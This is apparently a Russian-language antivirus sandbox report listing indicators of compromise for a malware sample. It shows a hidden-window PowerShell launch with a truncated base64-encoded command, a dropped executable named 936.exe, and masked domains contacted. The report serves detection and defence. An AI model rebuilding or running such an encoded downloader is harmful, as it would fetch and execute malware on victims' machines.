Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABQAHcAZQBjAHYAdgBxAGIAYQA9ACcASwB4AG0AaABpAGMAZwBnACcAOwAkAFcAawBrAGMAcgBsAGEAYwB4AGUAdABsAGwAIAA9ACAAJwA5ADMANgAnADsAJABIAGQAeAB3AGwAbgBxAGoAZwB2AHEAbAA9ACcARAB0AGUAYwBmAGoAawBuAHEAYgA...
- %HOMEPATH%\936.exe
- %HOMEPATH%\936.exe
- 'mv###nte.com.br':80
- 'to#####.#ommunitymonitoring.org':443
- DNS ASK me####anandco.net
- DNS ASK to#####.#ommunitymonitoring.org
- DNS ASK rc#####seofworship.org
- DNS ASK mv###nte.com.br
- DNS ASK do####ria-lb.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABQAHcAZQBjAHYAdgBxAGIAYQA9ACcASwB4AG0AaABpAGMAZwBnACcAOwAkAFcAawBrAGMAcgBsAGEAYwB4AGUAdABsAGwAIAA9ACAAJwA5ADMANgAnADsAJABIAGQAeAB3AGwAbgBxAGoAZwB2AHEAbAA9ACcARAB0AGUAYwBmAGoAawBuAHEAYgA...' (со скрытым окном)